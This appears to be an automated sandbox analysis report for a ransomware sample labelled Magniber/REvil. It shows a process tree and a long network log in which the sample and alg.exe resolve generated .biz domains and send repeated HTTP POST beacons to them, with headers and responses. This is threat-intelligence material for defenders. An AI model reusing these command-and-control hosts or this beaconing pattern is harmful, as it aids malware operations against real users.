- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 588 592 600 65536 596
  2⤵
  - Modifies data under HKEY_USERS
  PID:808
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  PID:2352

C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
1⤵
- Drops file in Windows directory
PID:2360

Network

DNS

pywolwnvd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
POST

http://pywolwnvd.biz/fiome

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /fiome HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5dcfdeed93cab5b3046eeb9796e6e9a0|191.101.209.39|1719160323|1719160323|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pywolwnvd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
DNS

ssbzmoy.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://pywolwnvd.biz/stiyorx

alg.exe

Remote address:

54.244.188.177:80

Request

POST /stiyorx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=aceee36b7a73b90ad00d302291a222ce|191.101.209.39|1719160324|1719160324|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ssbzmoy.biz/bscett

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /bscett HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=470c3629959c50049156dcd176263ec1|191.101.209.39|1719160324|1719160324|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ssbzmoy.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://ssbzmoy.biz/vtuu

alg.exe

Remote address:

18.141.10.107:80

Request

POST /vtuu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b1ed07901c096d1aafcbde292349e2f7|191.101.209.39|1719160325|1719160325|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cvgrf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/yrxcpttgqj

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /yrxcpttgqj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f45e2165f07adeb3e6f8c6be38f05376|191.101.209.39|1719160325|1719160325|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cvgrf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/dbofrwblmkayp

alg.exe

Remote address:

54.244.188.177:80

Request

POST /dbofrwblmkayp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=93896bc0bc55308b7775f3c391f0eabe|191.101.209.39|1719160325|1719160325|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

npukfztj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/g

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fec1ad310bcf9b24e80c2e329a8973e3|191.101.209.39|1719160325|1719160325|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

alg.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

172.234.222.143

przvgke.biz

IN A

172.234.222.138
POST

http://przvgke.biz/qsnwx

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.143:80

Request

POST /qsnwx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

npukfztj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/if

alg.exe

Remote address:

44.221.84.105:80

Request

POST /if HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7cc265d9ae6d09bfccce88ecd6ded757|191.101.209.39|1719160326|1719160326|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://przvgke.biz/if

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.143:80

Request

POST /if HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

przvgke.biz

alg.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

172.234.222.143

przvgke.biz

IN A

172.234.222.138
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
POST

http://przvgke.biz/ttt

alg.exe

Remote address:

172.234.222.143:80

Request

POST /ttt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/yroifghpflyp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /yroifghpflyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=985103df3ad86ae8384f2afdc6770823|191.101.209.39|1719160327|1719160327|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://przvgke.biz/gomt

alg.exe

Remote address:

172.234.222.143:80

Request

POST /gomt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
DNS

xnxvnn.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xnxvnn.biz

IN A

Response

xnxvnn.biz

IN A

13.251.16.150
POST

http://knjghuig.biz/crufnxhgtq

alg.exe

Remote address:

18.141.10.107:80

Request

POST /crufnxhgtq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5802ff90ca310cac8b1b9dc20f153ea0|191.101.209.39|1719160327|1719160327|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

vjaxhpbji.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

vjaxhpbji.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

xlfhhhm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

47.129.31.212
POST

http://xlfhhhm.biz/umsjegcmfdsxrv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /umsjegcmfdsxrv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bbb639976cb6e7a82f761d2b2b5d2725|191.101.209.39|1719160413|1719160413|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xlfhhhm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

47.129.31.212
POST

http://xlfhhhm.biz/idvyemitvlcfuuh

alg.exe

Remote address:

47.129.31.212:80

Request

POST /idvyemitvlcfuuh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6102bdc1384981e070e020ca8a03c275|191.101.209.39|1719160413|1719160413|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/qbkxi

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /qbkxi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=58a68dfbb4f9313600d725c7140f7b34|191.101.209.39|1719160414|1719160414|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/tbp

alg.exe

Remote address:

13.251.16.150:80

Request

POST /tbp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4f528f27638f895cf1359c96d6073e8b|191.101.209.39|1719160414|1719160414|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

saytjshyf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

44.221.84.105
POST

http://saytjshyf.biz/yfwtec

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /yfwtec HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e45f3426e236bfda355affa4be5cf3c5|191.101.209.39|1719160414|1719160414|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/x

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /x HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0710b5f734774d7adaac6a82145c767f|191.101.209.39|1719160415|1719160415|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

saytjshyf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

44.221.84.105
POST

http://saytjshyf.biz/k

alg.exe

Remote address:

44.221.84.105:80

Request

POST /k HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a84c080ec71bb354e68ab3fab715f539|191.101.209.39|1719160415|1719160415|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/k

alg.exe

Remote address:

18.141.10.107:80

Request

POST /k HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4a4abb6cd14bfc564b7734db3f79223a|191.101.209.39|1719160416|1719160416|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

172.234.222.143

fwiwk.biz

IN A

172.234.222.138
POST

http://fwiwk.biz/jwfw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.143:80

Request

POST /jwfw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://fwiwk.biz/acytqoynepalncmh

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.143:80

Request

POST /acytqoynepalncmh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
POST

http://tbjrpv.biz/b

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.246.200.160:80

Request

POST /b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=74067215f4d331276a83b3bf8948a21b|191.101.209.39|1719160416|1719160416|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

alg.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

18.208.156.248
POST

http://deoci.biz/vdfprnykloltsh

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /vdfprnykloltsh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:36 GMT
Content-Type: text/html
